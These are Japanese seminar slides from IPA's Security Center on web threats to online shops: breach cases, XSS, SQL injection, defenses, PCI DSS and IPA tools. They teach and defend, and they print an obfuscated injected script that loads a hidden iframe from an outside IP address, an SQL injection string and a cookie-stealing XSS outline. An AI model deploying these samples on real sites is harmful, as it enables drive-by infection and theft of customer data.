ネット通販セキュリティ対策セミナー ネット通販サイトにおける脅威と対策方針 ~ 近年の脅威やその対策方針 セキュリティ対策ツールの紹介など ~ 独立行政法人情報処理推進機構セキュリティセンター Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー

ネット通販セキュリティ対策セミナー

ネット通販サイトにおける脅威と対策方針

～近年の脅威やその対策方針、セキュリティ対策ツールの紹介など～

独立行政法人 情報処理推進機構

セキュリティセンター

１．今、何が起こっているのか？

1.1 インターネットを取り巻く状況は？

1.2 ウェブアプリケーションの脆弱性 1.3 ウェブサイト形態と対応責任

２．脆弱性の解説

３．ウェブサイトのセキュリティ対策方針

４．セキュリティ対策ツールの紹介

1.1 インターネットを取り巻く状況は？

恐ろしい状況の前に、

まずはネット通販の特色から。

z 本日お越しの皆様は、今インターネット上で

どのような状況となっているかわかりますか？

ネット通販の利便性

z インターネットを利用した通信販売は、新鮮 な情報をいち早く掲載でき、柔軟な価格設定 やキャンペーン等の販促も手軽に実施可能 で、また利用者登録により利用者への利便 性も上げられ、従来の通信販売と比べ飛躍 的に営業効率を上げられる。

z このようなメリットから、どれだけ売上げを上

げられるか「成功の秘訣」「効果的な広告掲

載」「購買分析」などデザインや表現を重視し

たウェブサイトを開発する事になる。

ネット通販における考慮など

z これらの考えは事業発展における重要な ファクターである。

z もちろん「ネット通販における規制」や「広告 メールに関する規制」など各種規制関連は 対策され守られるものである。

z またクレーム対策などのノウハウは蓄積され ている。

しかし、次の問題は解決されているか？

インターネット上の被害例 ^{（その１）}

z 価格情報提供サイト

2005 年 5 月、 ウェブサイトに不正なプログラムが 仕掛けられ、閲覧したユーザがウイルスに感染 したという事を発表。

ウェブサイトのプログラムを直すそばから何者か により改ざんされていった。その後攻撃の頻度 が急増しサイトを閉鎖。（ 10 日間の閉鎖）

登録ユーザのメールアドレス 2 万 2511 件漏えい。

5 月の月間 PV は、前月比で約 4 割減。

取引業者への影響大。

インターネット上の被害例 ^{（その２）}

z 音響機器・楽器通販サイト

2008 年 4 月、サイバー攻撃により顧客情報が 10 万件弱流出した可能性がある事を発表。

クレジットカード情報が不正利用され、

2008 年 3 月にカード会社が検知し判明。

セキュリティ会社の調査により、 2006 年 6 月頃に 最初の不正侵入があった事が判明。

会員 12 万 2884 人に 1000 円を次回購入時割引。

セキュリティ会社への作業依頼とサーバ交換等

で 6,000 万円強の費用をかけた対策を行った。

インターネット上の被害例

z 他にもインターネット通販サイト等に、多くの被害が 取り沙汰されている。

• クレジットカード番号や個人情報の漏えい

– 健康食品や医薬品販売サイト – 化粧品販売サイト

– 雑貨販売サイト

– 釣具・アウトドア用品販売サイト

• ウイルス感染などを引き起こすウェブサイトの改ざん

– ウイルス対策ソフト開発会社 – 自動車情報サイト

– 政府関連のウェブサイト

– 家庭用ゲーム会社のウェブサイト（米国）

など

これは代表的な

内容であり、毎日

のようにホーム

ページが攻撃され

被害が出ている。

ネット通販をとりまく脅威 ^(*1)

z フィッシングサイト（別ドメイン利用、脆弱性利用）

偽情報の表示

カード番号やパスワード等の情報漏えい

z 他人へ「なりすまし」

商品の購入

z DB ^(*2) に蓄積された非公開情報の閲覧

重要（個人）情報漏えい

z DB に蓄積された情報の改ざん、消去

偽情報の表示、パスワード変更、システム停止 ウイルス感染サイト化

(*1)

脅威とは、被害に繋がるような状態。

(*2)

DB（データベース）：関連し合うデータを収集・整理して、検索や更新を効率化したファイル。

脆弱性による脅威

これらの脅威は、ウェブアプリケーションに脆弱性が 存在する事が原因で、その脆弱性を悪者が利用し 攻撃した事によるものです。

フィッシングサイト（脆弱性利用）

なりすまし

クロスサイト・スクリプティングの脆弱性

DB に蓄積された

・非公開情報の閲覧

・情報の改ざん、消去

SQL インジェクションの脆弱性

1.2 ウェブアプリケーションの脆弱性

z 本日のセミナーでは、最近大きな被害に繋が っている

ウェブアプリケーション の 脆弱性

に関するセキュリティ対策を取り上げる。

そもそも脆弱性ってなに？

z 脆弱性（ぜいじゃくせい）とは

¾ コンピュータ不正アクセスやコンピュータウイルスなどの攻撃により、

その機能や性能を損なう原因となり得るセキュリティ上の問題箇所 のこと

（出典：情報セキュリティ早期警戒パートナーシップガイドライン）

z 脆弱性を利用すると

¾ 問題点箇所を巧みに悪用し、コンピュータの内部データ（情報）を 盗んだり、書き換えたり、削除したり、また他のコンピュータへの 同様の悪事を働くことが可能となる

（これが不正アクセスであり、プログラム化して自動的に動作するの がウイルスやボットである）

z 脆弱性対策は根本的なセキュリティ対策

¾ セキュリティ対策としてウイルスなどの対策も十分必要だが、脆弱性 を無くすことが最も重要！！

要は、第三者

からの攻撃

z ウェブページは 2 つのタイプに分けられる。

静的ページ

• いつ見ても変わらぬ内容を表示（画像やテキスト文字等）

• 静的なコンテンツをウェブサーバが表示する

動的ページ

• 入力された内容を元に DB へ問合せ、必要な情報を取得 し、それを元にウェブページを生成し表示する

• 利用者が入力した内容を確認するページなどが該当

• SNS 、ブログ、電子掲示板、ショッピングカートなど

ウェブアプリケーションとは？

z 動的ページを作りだすプログラムが

ウェブアプリケーション。

1.3 ウェブサイト形態と対応責任

z 代表的な通販サイトの形態と脆弱性対応責任

N

o サイト形態 形態概要 脆弱性の可能性 脆弱性対応責任

１ オーサリングツー ル利用

ウェブページ作成ソフトウェア 製品を使い、自分でホーム ページを作成する方法。

ウェブページ作成用サンプルプログ ラムや、機能モジュールに脆弱性。

製品の脆弱性は製品開発者に対応責 任があるが、サイト運営者として最新版 製品を入手し、サイトに反映させる責任 がある。

２ ポータルサイト構 築ソフトウェア製 品利用

ショッピングカート、電子掲示 板、ブログ、Wiki 等のウェブ アプリケーションソフトウェア 製品（CMS等）を使う方法。

•製品そのものが抱える脆弱性。

• 独自でカスタマイズし利用する事も あり、カスタマイズ部分に脆弱性が 発生する可能性あり。

•製品の脆弱性の場合は No1 の対応責

任と同様

•独自の場合はサイト運営者の責任で対 処する。

３ 独自開発のうえ利 用

機能やデザインを独自なもの とする為、自社や委託先で ウェブアプリケーションを開発 し、それを使う方法。

脆弱性が発生する可能性あり。

セキュリティを十分考慮した設計・

開発がなされていないと、その可能 性が高い。

自社開発であれ委託開発であれ、サイト 運営者に対応責任がある。

４ ISP 提供サービス 利用

ISP が CMS や DB 等を活 用し、「簡単ホームページ作 成」と言うようなサービスを提 供。それを使う方法。

ISP はウェブアプリケーションソフト ウェア製品を利用しており、製品に 脆弱性が発見される可能性あり。

•ISP が製品の管理まで行う場合は ISP が対応。

•ISP は製品のインストールまでで、後の 対応はサイト運営者責任のケースもある。

５ ショッピングモール 等のサービスを利 用

ショッピングモールで提供し ている、支払決済や配送など も含めたショッピング機能を 使う方法。

ショッピングモールで利用している ウェブアプリケーションソフトウェア

（独自開発やソフトウェア製品）に 脆弱性が発見される可能性あり。

•ショッピングモールが対応。

対応責任を踏まえた

サイト運営者の役割

z 自社（委託を含む）責任の場合

脆弱性の原理や対策方法の理解、および対策。

委託発注時にセキュリティ要件を盛込む。

委託契約内容の確認（脆弱性発生時の保守など）

z 製品開発者責任の場合

製品仕様の確認（脆弱性なのか機能が不十分なのか）

製品開発者への脆弱性報告（後述のパートナーシップを利用）

製品が対策された時点で、サイト運営者がサイトに反映させる。

z サービス提供者責任の場合（ ISP やモールなど）

サービス規定の確認（脆弱性等不具合への対応責任）

サービス提供者への連絡

１．今、何が起こっているのか？

２．脆弱性の解説

2.1 情報セキュリティ早期警戒パートナーシップ 2.2 脆弱性関連情報の届出状況

2.3 クロスサイト･スクリプティング 2.4 SQL インジェクション

３．ウェブサイトのセキュリティ対策方針

４．セキュリティ対策ツールの紹介

z 脆弱性情報を適切に流通させるために

¾ 不適切な脆弱性の公開による問題は実際に発生しており、それを解決させる ために 2004 年 7 月経済産業省告示「ソフトウエア等脆弱性関連情報取扱基準」

が制定された。これを踏まえ、IPA・JPCERT/CCなど6団体から、脆弱性関連 情報の適切な流通により、コンピュータ不正アクセス、コンピュータウイルスな どによる被害発生を抑制するために、関係者に推奨する行為をとりまとめた

「情報セキュリティ早期警戒パートナーシップガイドライン」が公表された。

2.1 情報セキュリティ早期警戒

パートナーシップ （脆弱性関連情報の届出制度）

【受付分析機関】

【調整機関】

脆弱性関連情報届出 脆弱性関連情報通知

対応状況の集約 公表日調整等

z 届出累計が 5,000 件を突破！

¾ 脅威的な届出件数

届出開始から約 4 年間で 2,045 件、ここ 1 年間で 3,206 件 1 日に平均 4.6 件の届出（最大 142 件 / 日、 2008 年 11 月 7 日）

2.2 脆弱性関連情報の届出状況

脆弱性関連情報の届出件数の四半期別推移

ウェブサイト脆弱性届出の

種類別内訳

z ウェブサイト脆弱性の種類は「クロスサイト・スクリプ ティング」と「 SQL インジェクション」が約 6 割を占める

ウェブサイトの脆弱性として IPA に届けられ受理した 4,235 件の内訳

～ 届出開始から2009年第１四半期（2009年3月末）まで ～

2.3 クロスサイト･スクリプティング

能動的攻撃

z攻撃者は、直接サーバなどを攻撃す

る。

z イントラネット内への攻撃は難しい。

z攻撃される側の行動は不要で、いつ でも攻撃可能。

受動的（誘導型）攻撃

z攻撃者は、利用者が特定の行動をと

るよう誘導する。

zFW で通信を許可している、ウェブやメー ル等を利用した攻撃。

zイントラネット内のシステムの攻撃に、

よく用いられる。

○○○○○○○○

■■■■■■■■■■■■■■

■■■■■■■■■■■■■■

■■■■■■

■■■■■■■■■■■■■■

■■■■■■■■■■■■■■

■■■■■■

誘導型攻撃のイメージ

z 近年のネットワーク環境の変化により、多くのネット ワークにファイアウォールの導入が進んだ

z 個人のような小規模なネットワークであっても、

「 Windows ファイアウォール」のように、 OS に標準 搭載されたファイアウォールが機能するようになった

z 利用者が罠のウェブページやメールを 閲覧することで、成立する攻撃に移行

「誘導型」攻撃が増えた背景

迷惑メール経由の攻撃例

「誘導型」攻撃のイメージ

ａ） 書かれているリンク先は、人気動画サイトのURLに見せ かけているが、実際のリンク先はウイルスが埋め込まれてい るウェブサイト

ｂ） ここをクリックすると、ウイルスがダウンロードされる！

利用者

ウェブサーバ 検索キーワード IPA

利用者

検索キーワード

<s>IPA</s>

ウェブサーバ

<s>は、取り消し線 を引くHTMLタグ

<html>

【IPA 】を含む検索結果

… </html>

IPA

<html>

【<s>IPA</s> 】を含む 検索結果

… </html>

<s>IPA</s>

" < " および " > " が出力され、HTMLタグとして 認識されてしまう （表示が崩れる）

【IPA】を含む 検索結果

【IPA】を含む 検索結果

①

③ ②

① ’

② ’

③ ’

クロスサイト・スクリプティングの動作 ^{（その１）}

一般利用者

【<script> … document.

cookie … </script>】を 含む検索結果

脆弱なウェブサーバ へのリンク（悪意の スクリプトを含む）

悪意のある ウェブサーバ

ウェブサーバ

・ウェブページに好きな文章等を表示させる（ページ改ざん）

・ブラウザ上からは見えない命令を書き込み、情報を盗む

悪意のあるウェブサーバに セッションCookie をこっそり 送信するようなスクリプト

スクリプトがページ内に 書き込まれる

<script> …

document.cookie … </script>

スクリプト実行

【】を含む 検索結果

①

②

④ ③

⑤

⑥

検索キーワード

セッションIDや Cookie

クロスサイト・スクリプティングの動作 ^{（その２）}

2.4 SQL インジェクション

○○○○

○○○○○○○○

■■■■■■■■■■■■■■

■■■■■■■■■■■■■■

■■■■■■

■■■■■■■■■■■■■■

■■■■■■■■■■■■■■

■■■■■■

○○○○○○○○

■■■■■■■■■■■■■■

■■■■■■■■■■■■■■

■■■■■■

■■■■■■■■■■■■■■

■■■■■■■■■■■■■■

■■■■■■

○○○○

○○○○○○○○

■■■■■■■■■■■■■■

■■■■■■■■■■■■■■

■■■■■■

■■■■■■■■■■■■■■

■■■■■■■■■■■■■■

■■■■■■

http://△△△.or.jp/

http://▼▼▼.ne.jp/

http://○○○.co.jp/

SQL インジェクション攻撃による、ウイルス感染イメージ

ウェブサイトへの攻撃が増えた背景

z 2006 年に出現した MPack や IcePack などの ウェブサイト攻撃ツールによって攻略される

¾ ウェブサーバやウェブアプリケーションの複数の

脆弱性を自動的に攻撃する機能や管理機能を備え、

販売されている。

● 攻撃対象のサイトへ 罠サイトへ誘導する 仕組みを埋め込む。

● サポートが充実。

頻繁にアップデートも。

● 各種ウイルス対策ソフトに 検出されない旨をアピール

● 価格（元を日本円換算）

1 ヶ月： 6,000 円 2 ヶ月： 15,000 円 4 ヶ月： 30,000 円 6 ヶ月： 45,000 円

中国では決して安くない。

● しかしこのソフトにも 脆弱性が存在。 (^_^;) 認証が回避可能な 裏ツールも出回る。

ファイル形式 攻撃対象の脆弱性

攻撃先 URL

オプション

会員認証 サポート先

z 2006 年に出現した MPack や IcePack などの ウェブサイト攻撃ツールによって攻略される

¾ ウェブサーバやウェブアプリケーションの複数の

脆弱性を自動的に攻撃する機能や管理機能を備え、

販売されている。

z ウェブサイトの改ざんは、他の攻撃と同様、目に 見えない形で行われる傾向がある

¾ インラインフレームやスクリプトなどといった、不可視

の状態でウェブサイトに挿入できるものが混入される

ため、利用者がウェブブラウザから閲覧しただけでは

違いが全く判らない。

ウェブサイトの改ざん例

<iframe src='http://url' width='1' height='1' style='visibility:

hidden;'></iframe><script>function

v4760be4c05e00(v4760be4c065f7){ function v4760be4c06def () {return 16;}

return(parseInt(v4760be4c065f7,v4760be4c06def()));}function v4760be4c07de0(v4760be4c081dc){ var

v4760be4c085d9='';for(v4760be4c089d5=0;

v4760be4c089d5<v4760be4c081dc.length;

v4760be4c089d5+=2){ v4760be4c085d9+=(String.fromCharCode(v4760be4 c05e00(v4760be4c081dc.substr(v4760be4c089d5, 2))));}return

v4760be4c085d9;}

document.write(v4760be4c07de0('3C5343524950543E77696E646F772E73 74617475733D27446F6E65273B646F63756D656E742E777269746528273 C696672616D65206E616D653D3735393830313431207372633D5C276874 74703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746 D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292 A313632353235292B27663865656666625C272077696474683D353931206 865696768743D323735207374796C653D5C27646973706C61793A206E6F 6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>

<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function ..

SQL インジェクションの動作

ウェブサーバ

＋

ウェブアプリ

データベース ID john

john の情報 user

SELECT * FROM user WHERE id=‘$ID’

SQL文例

SELECT * FROM user WHERE id= ‘ john ' john

一般利用者

悪意を持つ人

ID john ’ or ‘A’=‘A

全てのユーザ の情報

SELECT * FROM user

WHERE id= ‘ john’ or ‘A’=‘A ' john’ or ‘A’=‘A

「全て」を意味する

・データベースから重要な情報が盗まれてしまう

①

②

③

④

① ’

②’

③’

④ ’

SQL インジェクションの攻撃傾向

出典：株式会社ラック 「SQLインジェクション攻撃検知（2009年2月まで）」より

http://www.lac.co.jp/info/alert/alert20090303.html

１．今、何が起こっているのか？

２．脆弱性の解説

３．ウェブサイトのセキュリティ対策方針

3.1 ネット通販における他の脅威と対策 3.2 セキュリティ確保のための基本対策

４．セキュリティ対策ツールの紹介

3.1 ネット通販における他の脅威と対策

z ウェブアプリケーションの脆弱性以外にも 脅威は存在する。

紙媒体・記録媒体（ USB ， CD ‥）等の紛失・盗難 メール等の誤送信

マネジメント的対策（ポリシー・ルールの策定と運用）

技術的対策（接続装置の制御、記憶媒体の暗号化）

ウイルス・ワーム感染

ウイルス対策ソフトの利用

ウェブサーバの設定ミスなど不適切な運用

サーバの要塞化

通信の盗聴

SSLなどの暗号化通信

3.2 セキュリティ確保のための基本対策

セキュアなウェブサイトを構築・維持するためには、全体を見通し た出来るだけ漏れがない対策を、組織的に実施することが重要。

„ セキュリティ予算確保

„ 開発の委託

„ セキュアな開発

„ 適切なサーバ構築

„ ID ・パスワードの強化

„ 設定情報のバックアップ・ログ収集

„ セキュリティ対策機器の導入・監視

„ セキュリティ監査

„ セキュリティ事故発生を想定した体制作りと運用

„ セキュリティメンテナンス

製 サ

製 サ 製 サ 製 サ

この基本対策は、自社でウェブサイトを 構築管理している事を対象としている。

ソフトウェア製品利用時には ⇒ サービス利用時には ⇒

製

サ

セキュリティ予算確保

z セキュリティ確保のために予算化

ウェブサイト運営にはセキュリティ対策の責任がある。

セキュリティ対策や維持には相応の費用が必要。

• 脆弱性を作り込まぬために必要な費用

• セキュリティは時間と共に強度が低下するため維持する費用

ウェブサイト運営の企画段階から開発や運用に必要な セキュリティ予算を検討し確保する。

z 上司や予算担当者への説得

セキュリティ対策の重要性と必要費用を説明。

セキュリティ対策は費用対効果が計りづらいものだが、安全 性を訴えた積極的なサイト運営を特色とするのも手ではない か。

製 サ

開発の委託

z セキュリティ発注要件の必要性

従来の開発では、契約上セキュリティに関する要件は十分 な内容ではなかった。

その結果、脆弱性のようなセキュリティに関する問題が発覚 しても、委託側・受注側ともに不幸な結果を招く事が多い。

特に委託側に新たな費用を必要とする傾向がある。

z セキュリティ要件を盛り込む

瑕疵担保契約にて責任を明確する。

発注仕様や要求仕様に具体的な要求仕様を盛り込む。

http://www.jnsa.org/active/2005/active2005_1_4a.html

¾ 参考： JNSA セキュアシステム開発ガイドライン

「 Web システム セキュリティ要求仕様（ RFP ）」編 β 版

セキュアな開発

セキュリティを確保したウェブアプリケーションの 開発にはセキュリティ（脆弱性）の知識が必須。

自社で開発する上では十分理解する必要がある。

z 脆弱性の理解

脅威の仕組みや問題の原因を正しく理解する。

• 「知っていますか？脆弱性（ぜいじゃくせい）」

z 安全なプログラミング

安全にプログラムを作成する知識を身に付ける。

• 「安全なウェブサイトの作り方」

• 「セキュア・プログラミング講座」

z セキュリティを考慮したシステム構成

ネットワークセグメントの分離

• 外部セグメント、 DMZ ^{（非武装地帯）} の設置、内部セグメント

z サーバ要塞化

最小構成

• 不要なサービスの停止

• 不要なアプリケーションの削除

最新のソフトウェア構成 アクセスコントロール設定

• 職務に応じた適切なアクセス権

適切なサーバ構築

インター ネット

ファイアウォール

ウェブサーバ メールサーバ DNSサーバ

DBサーバ

DMZ 内部セグメント 外部

セグメント

ID ・パスワードの強化

z パスワード管理を徹底

不要なアカウントの削除

辞書に載っている文字列は使わない

長くて複雑なパスワード設定 （英字＋数字＋記号）

z SSH 接続を使う場合

公開鍵認証方式を利用

パスワードをどうしても利用する場合は徹底管理

製 サ

設定情報のバックアップ・ログ収集

z 正常時の設定情報などを保管

¾ 各サーバ設定内容、変更記録、作業手順など

¾ とにかく資料を残す。画面キャプチャーでも可。

z 必要なログ

UNIX 系 OS

¾ ログイン・ログアウト、プロセスの起動・終了、コマンド実行など

Windows 系 OS

¾ ログオン・ログオフ、アプリケーションの起動と停止、システム設定の 変更、各種イベントの発生状況など

Web サーバ

¾ 各クライアントからのアクセス履歴、エラーログなど

z ログ解析の警告メールの自動送信化。 NTP 時刻同期。

セキュリティ対策機器の導入・監視

z ファイアウォール

内部から外部への不要な通信を許可している場合が多い。

z IDS ^{（侵入検知システム）} ／ IPS ^{（侵入防止システム）}

IDSは通信回線を監視しネットワークへの侵入を検知して管理者に通報 するシステム。IPSはIDSの機能を拡張し、侵入を検知したら接続の遮断 などの防御をリアルタイムに行なう機能を持つ。

z WAF ^（ Web Application Firewall ）

IDS/IPS ではパケットの中身に危険なコードが含まれていても中身までは 解析できないことがあるが、WAF ではパケットの中身までを解析し、危険 なコードをブロックすることができる。

z リアルタイム監視

これらのセキュリティ対策機器を利用し、発生した警告をすぐさま察知し、

問題の通信を瞬時に防ぐ事が大切である。

• 24 時間 365 日対応できるエキスパートを自社雇う若しくは育てる。

• 専門のセキュリティベンダーに任せる。 （餅は餅屋）

IDS/IPS

ファイアウォール WAF

サーバ FW・IDS/IPS・WAFの設置と防御のイメージ

セキュリティ検査

z セキュリティ検査、ウェブアプリケーション検査

ウェブサイト公開にあたり十分なセキュリティ対策が行われ ているか、第三者からの検査にて問題点を確認し、問題が あれば対処のうえ公開する。

時間とともに新たな脆弱性が発見されるので、定期的な検 査も重要。

z 情報セキュリティ監査企業台帳

情報セキュリティ監査をサービスとして行う主体を登録

z 情報セキュリティ対策ベンチマーク

組織のセキュリティ対策状況を自ら評価するための自己診

断ツール

【参考】情報セキュリティ監査企業台帳

http://www.meti.go.jp/policy/netsecurity/is-kansa/

【参考】

情報セキュリティ対策ベンチマーク

http://www.ipa.go.jp/security/benchmark/

【参考】

PCI DSS （Payment Card Industry Data Security Standard）

z PCI DSS は、クレジット決済サービスに携わる事業者の間で、クレジットカード情報や

決済情報を保護するための基準を共通化することを目的とした、情報セキュリティ基 準である。

z PCI DSSは、国際ペイメントブランド5社（Visa, Master, American Express, Diners, JCB ）が共同で設立した機関である PCI SSC （ Security Standards Council ）が 2006 年 9 月から策定・運用しているもので、事実上の世界標準となりつつある。

z PCI DSS の規程は、「安全なネットワークの構築と維持」や「脆弱性管理プログラム

の整備」などの6分野を対象とし、「ファイアウォールをインストールして構成を維持す ること」や「アンチウィルスソフトウェアまたはプログラムを使用し、定期的に更新する こと」など、合計で 12 の要件を定めている。要件は具体的に記載されており、解釈の 違いが起こりにくくなっている。

z クレジット決済事業者はPCI DSSへの準拠が義務化されつつある。義務化される時 期やその内容は、国や事業者の規模等によって異なる。日本の大規模店舗の場合、

あるペイメントブランドにおいて 2010 年 9 月 30 日に義務化される見込みであり、他の

ネットショップ事業者、決済代行事業者などにおいても対応が必要と見込まれる。

セキュリティ事故発生を想定した

体制作りと運用

z セキュリティ事故が起こると、被害はその会社 だけに留まらず、取引先や関係者にも大きな影 響を与える。

z 事故が起きる前に、事故対応の準備が必要。

z 社内体制の確立

役割分担の決定（特に責任者）

連絡経路の整備

z 運用手順書などの作成 z 模擬訓練

製 サ

セキュリティメンテナンス

z 情報収集と対策の実施

脆弱性は日々発見されるので、 OS やソフトウェアの開発者 から提供される脆弱性情報を継続的に入手し、ソフトウェア の更新や問題の回避が必要。

z 日頃の情報収集

JVN 、 JVN iPedia 、 MyJVN 、 IPA 利用製品ベンダーの HP

各種 ML

ニュースサイト

z セキュリティパッチの検証環境

テスト系サーバの確保

製 サ

【参考】脆弱性対策情報ポータルサイト ＆ データベース JVN（Japan Vulnerability Notes） ＆ JVN iPedia

JVN JVN

http://jvn.jp/

製品開発者と調整した 脆弱性対策情報を

タイムリーに公開

JVN iPedia

http://jvndb.jvn.jp/

国内で利用されている 製品を対象にした脆弱性 対策情報を網羅し蓄積

JVN iPedia

１．今、何が起こっているのか？

２．脆弱性の解説

３．ウェブサイトのセキュリティ対策方針 ４．セキュリティ対策ツールの紹介

4.1 情報セキュリティ対策ツール情報 4.2 iLogScanner

4.3 ウェブサイト運営者のための脆弱性対応ガイド

4.4 安全なウェブサイト運営入門

4.1 情報セキュリティ対策ツール情報 ^その１

http://www.ipa.go.jp/security/vuln/vuln_contents/

z 「知っていますか？脆弱性（ぜいじゃくせい）」 - アニメで見るウェブサイトの脅威と仕組み -

http://www.ipa.go.jp/security/awareness/vendor/programmingv2/

z 新版「セキュア・プログラミング講座」

脆弱性の理解

脆弱性を作らないために

http://www.ipa.go.jp/security/vuln/documents/website_security.pdf z 「安全なウェブサイトの作り方 改訂第 3 版」

z ウェブサイトの脆弱性検出ツール iLogScanner z ウェブサイト運営者のための脆弱性対応ガイド

脆弱性攻撃の状況把握

脆弱性が発見されたら

z 「安全なウェブサイト運営入門」－７つの事件を体験し、ウェブサイトを守り抜け！－

ウェブサイトの事件を体験

z リモートアクセス環境におけるセキュリティ z 不正アクセスに関する届出

4.1 情報セキュリティ対策ツール情報 ^その２

z 電子メールの安全性を高める技術の利用法

z 大企業・中堅企業情報システムのセキュリティ対策 ～脅威と対策～

電子メールのセキュリティ

企業向けセキュリティ対策

z 小規模企業のための情報セキュリティ対策

http://www.ipa.go.jp/security/fy18/reports/contents/

リモートアクセス

不正アクセスの被害を受けたら

http://www.ipa.go.jp/security/ciadr/

4.2 iLogScanner （ウェブサイトの脆弱性検出ツール）

z 自前でウェブサイトを構築している運営者

どれほどの攻撃を受けているか、攻撃による 被害が発生していないか、常に状況を把握し 対策を検討する必要がある。

z 攻撃の状況を確認するためには、特別な スキルが必要

自前でセキュリティ技術者の育成や、有償の

セキュリティ監視サービスを受ける必要がある。

一般のサイト運営者が簡単に確認できない。

http://www.ipa.go.jp/security/vuln/iLogScanner/

4.2 iLogScanner （ウェブサイトの脆弱性検出ツール）

z 「 iLogScanner 」がウェブサイトのアクセス ログを解析。

ウェブサイトへの攻撃痕跡を確認可能。

一部の痕跡に関しては、攻撃が成功した 可能性を確認可能。

z ただし iLogScanner は簡易ツール

攻撃と思われる痕跡を全て網羅し、確実に 検出するものではない。誤検出もあり得る。

iLogScanner で攻撃が検出された場合、

セキュリティベンダーへの相談をお勧め。

過信は禁物

http://www.ipa.go.jp/security/vuln/iLogScanner/

4.2 iLogScanner （ウェブサイトの脆弱性検出ツール）

(*1) OSコマンド・インジェクションとは、Webサーバ上の任意のOSコマンドが実行されてしまう問題です。これにより、

Webサーバを不正に操作され、重要情報などが盗まれたり、攻撃の踏み台に悪用される場合があります。

(*2) ディレクトリ・トラバーサルとは、相対パス記法を利用して、管理者が意図していないWebサーバ上のファイルや ディレクトリにアクセスされたり、アプリケーションを実行される問題です。これらにより、本来公開を意図しないファイルが 読み出され、重要情報が盗まれたり、不正にアプリケーションを実行されファイルが破壊されるなどの危険があります。

(*3) その他（IDS回避を目的とした攻撃）とは、１６進コード、親パス等の特殊文字を使用して偽装した攻撃用文字列で 攻撃が行われることによりアプリケーションの妥当性チェック機構を迂回し、SQLインジェクション、クロスサイトスクリプ ティング等の攻撃を行うことを狙ったものです。また、ワームなどが悪用するWebサーバの脆弱性を突いた攻撃でも、

このような特殊文字が使われます。それぞれの攻撃に応じた対策が必要になります。

脆弱性の種類 攻撃と思われる 痕跡

攻撃が成功し可能性が 高いと思われる痕跡

SQLインジェクション ○ ○

クロスサイト・スクリプティング ○ －

OSコマンド・インジェクション ^(*1) ○ －

ディレクトリ・トラバーサル ^(*2) ○ －

その他（ IDS 回避を目的とした攻撃） ^(*3) ○ －

http://www.ipa.go.jp/security/vuln/iLogScanner/

4.2 iLogScanner （ウェブサイトの脆弱性検出ツール）

z 検出環境

http://www.ipa.go.jp/security/vuln/iLogScanner/

4.2 iLogScanner （ウェブサイトの脆弱性検出ツール）

z 解析結果ログ表示

http://www.ipa.go.jp/security/vuln/iLogScanner/

4.2 iLogScanner （ウェブサイトの脆弱性検出ツール）

z 解析結果サマリー表示

http://www.ipa.go.jp/security/vuln/iLogScanner/

4.3 ウェブサイト運営者のための

脆弱性対応ガイド

z もしも脆弱性が発見されたらどうします？

対応方法の手引き

z ガイドの構成

脆弱性や修正に関する基本的な知識。

脆弱性を放置することの問題。

外部から脆弱性の存在を指摘された場合 どうするべきか。

具体的な脆弱性の確認・修正の作業手順、など。

http://www.ipa.go.jp/security/ciadr/vuln_website_guide.pdf

4.3 ウェブサイト運営者のための

脆弱性対応ガイド

1. ウェブサイトの危険性 1.1. 背景

1.2. ウェブサイトで起こるトラブル

1.3. 運営者に問われる責任

1.4. 本資料の目的

2. ウェブサイトに必要な対策 2.1. トラブルの原因となる脆弱性 2.2. 求められる継続的な対策

2.3. 対策実施にあたり理解すべきこと

3. ウェブサイトに脆弱性が見つかった場合

3.1. 脆弱性をどのように見つけるか

3.2. IPA から脆弱性に関する連絡を受けた 場合

3.3. 対応は意思決定から始まる

4. ウェブサイト運営者のための脆弱性対応 マニュアル

4.1. 対応の全体に係る留意点

4.2. 脆弱性に関する通知の受領

4.3. セキュリティ上の問題の有無に関する

調査

4.4. 影響と対策の方向性の検討 4.5. 対策作業に関する計画

4.6. 対策の実施

4.7. 修正完了の報告 4.8. その他

付録：脆弱性について通知を受けた場合の 作業 チェックリスト

z ガイドの内容

4.4 安全なウェブサイト運営入門

セキュリティ対策は経営的に コストとしか考えられていない。

積極的な経営戦略と 捉えるべき。

しかし現実には、痛い目を 見ないと、動こうとしない。

お金を使おうとしない。

「攻撃されるしかない」

「やられるしかない」

と考えがち。

それじゃぁいけないだろう。

事故起こしてからでは遅い。

擬似的に事故を体験 し脅威を理解させられ ないか。自分の意志で 対応を選択するゲー ムのような。

面白く、わかりやすい 教材はないか。

このような

コンセプト

から生まれ

たのが．．．

4.4 安全なウェブサイト運営入門

７つのインシデント

1. 電子メールの誤送信

2. クロスサイト・スクリプティング 3. SSLサーバ証明書の

期限切れ 4. ウイルス感染

5. サービス運用妨害 6. セッション管理の不備 7. SQLインジェクション

・非技術者でも分かり易いよう心掛けた内容や言葉遣い。

難しい専門用語にはルビで説明。

・各章の終わりで、寄り道として補足コンテンツが有り。

話を振り返り正しい対策論、その脅威の数字的なダメージなどを学ぶ事も可能。

結果でシナリオが変化、会社の経営に影響も！

結果の積重ねでサイトの評判に影響し売上にも影響。引いては会社の経営にも影響。

最悪会社が危機的状況に！上手く行けば事業拡大、分社化しプレイヤーが本部長に。

問題の対策をプレイヤーが選択

お客様からの問合せ殺到・・・ インシデント発生！

ショッピングサイト運営中の主人公に …

主人公がｲﾝﾀｰﾈｯﾄショッピングサイト責任者に！

プレイヤーが主人公として７つのセキュリティ事故を体験し対応する

4.4 安全なウェブサイト運営入門

z ニュースサイト記事やブログで評判

メディアや体験者からの評判は良好！

記事 ： INTERNET Watch、Security NEXT、ZDNet Japan、Itmedia

レビュー ： 夕刊フジ、@IT、Slashdot、EnterpriseZine、CodeZine、RBB TODAY、マイコミジャーナル セキュリティやWebサイト運営の基礎的な内容から解説されているそうなので、入門用教材として良いかと思わ れます。（出典：Slashdot ）

選択肢についてはさほど難しく感じることは少なかった。しかし、実際に、自らの運営するWebサイトにセキュリ ティ事件が発生した場合、このような冷静な判断ができるであろうか ? ( 中略 )

本ソフトでは、あえて「正しくない」選択をした場合にどのような結末を迎えるのか、それを読むのも有意義である と思う。 (中略)

本ソフトの最後に「商品と同様に安全を売るショップということでも注目を集めた」という台詞がある。これこそが ネットショップに、今、求められるものではないだろうか。 （出典：マイコミジャーナル）

